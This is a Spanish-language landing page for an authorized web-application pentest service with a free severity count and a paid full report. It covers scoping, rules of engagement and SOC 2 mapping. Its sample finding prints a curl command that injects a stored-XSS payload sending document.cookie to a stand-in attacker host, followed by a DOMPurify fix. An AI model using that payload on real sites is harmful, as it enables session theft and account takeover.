Ejecutamos un pentest autorizado contra tu aplicación web sin coste y compartimos el recuento por severidad. Desbloquea los findings completos (pasos de reproducción, puntuaciones CVSS, guía de remediación y evidencias SOC 2) por un precio fijo escrito en la autorización antes de empezar.
Un pentest tradicional cuesta entre 8.000 y 40.000 euros y tarda dos meses desde compras hasta entrega. Por eso los founders lo posponen más allá de la auditoría SOC 2, más allá de la revisión de compras enterprise y a veces más allá del breach.
Hemos quitado la barrera económica de entrada para que la conversación arranque con findings, no con facturas. Solo pagas cuando hay algo por lo que valga la pena pagar, y decides si el informe vale el precio después de haber visto el recuento por severidad.
Sin loop de compras. Sin lista de espera trimestral. Sin negociación de tarifa por día. Todo el arranque se hace con un solo formulario y una sola call.
Email de trabajo y URL de la aplicación que quieres testear. Eso es todo.
Quince minutos para confirmar activos in-scope, roles de autenticación y subsistemas out-of-scope. Precio de desbloqueo cotizado el mismo día.
Un documento breve define scope, rate limits, reglas no destructivas y el precio fijo de desbloqueo. No empezamos sin que esté contrafirmado.
El recuento por severidad llega gratis. Desbloquea el informe completo para recibir findings, CVSS, pasos de reproducción, guía de remediación y evidencias SOC 2.
El tier gratuito existe para que decidas con información si pasar al tier de pago. Si no encontramos nada critical, no debes nada.
Cada finding del informe de pago sigue la misma estructura: clasificación, evidencia, receta de reproducción, blast radius y un snippet de remediación que los ingenieros pueden desplegar sin una reunión de follow-up.
La card de la derecha es ilustrativa. Descarga abajo un ejemplo sanitizado de seis páginas del informe completo.
curl -X POST https://app.example.com/api/v1/comments \
-H "Authorization: Bearer $TOKEN" \
-d '{"body":"<img src=x onerror=fetch(\"https://attacker.tld/?c=\"+document.cookie)>"}'
// Sanitize on render, not on write.
import DOMPurify from "dompurify";
<div dangerouslySetInnerHTML={{ __html: DOMPurify.sanitize(comment.body) }} />
Los auditores quieren evidencias, no capturas. El informe de pago conecta cada finding con el criterio SOC 2 al que toca, y nuestra cobertura de testing mapea sobre la OWASP Web Security Testing Guide, para que puedas demostrar scope completo, no muestreo selectivo.
| Control SOC 2 | Qué testeamos | Sección OWASP WSTG |
|---|---|---|
| CC4.1 Monitoring | Cobertura de detección sobre injection, broken auth y rutas de privilege escalation | WSTG-INPV, WSTG-ATHN, WSTG-ATHZ |
| CC7.1 System operations | Completitud de logs y resistencia a manipulación bajo actividad de atacante | WSTG-ERRH, WSTG-CRYP |
| CC7.4 Incident response | Verifica que las alertas saltan en los patrones de ataque que tu runbook dice cubrir | WSTG-CONF, WSTG-IDNT |
Tras la remediación re-testeamos los mismos controles y emitimos una atestación de follow-up. El re-test está incluido en el precio de desbloqueo durante 60 días.
El pentest autorizado es una práctica definida desde hace más de veinte años. No hacemos nada sin tu permiso firmado, y una vez que lo tenemos seguimos un conjunto estricto de reglas operativas para que el test no se convierta nunca en el incidente.
Confirmamos que controlas el activo mediante un registro DNS TXT o una carta firmada en papel con membrete corporativo. Sin excepciones, ni siquiera con clientes ya conocidos.
Las probes automatizadas están limitadas a 10 peticiones por segundo por host. La explotación manual va a velocidad humana. Tu monitoring verá tráfico, no presión.
No borramos, modificamos ni exfiltramos datos de producción. La evidencia de proof-of-concept se captura con la profundidad mínima necesaria para confirmar la vulnerabilidad.
Findings, pruebas y capturas se cifran end to end. El acceso queda limitado al lead tester y a un solo revisor.
Los informes se conservan 90 días para soportar el re-test incluido y luego se eliminan a petición. Nunca compartimos findings con nadie fuera del proyecto.
Todo lo declarado out-of-scope en la autorización se trata como production-critical. Si un finding lo atraviesa, paramos y consultamos antes de seguir.
El pentest cubre tu aplicación. El add-on OSINT cubre el perímetro que no puedes parchear: credenciales filtradas en dumps públicos, buckets S3 expuestos e indexados por buscadores, repositorios de GitHub con tokens hardcoded y la huella de LinkedIn que hace trivial el phishing dirigido.
Cotizado como proyecto aparte. La mayoría de equipos lo añaden en el segundo ciclo, después de remediar los findings de la aplicación.
Deja tu email de trabajo y la URL de la aplicación que quieres testear. Respondemos en 24 horas con un scope propuesto, el precio de desbloqueo y un slot de call de 15 minutos.
Dos campos. Del resto nos encargamos.
Baseline gratuita. Desbloqueo de pago solo si hay algo por lo que valga la pena pagar. Scoping esta semana.
Pide un pentest gratis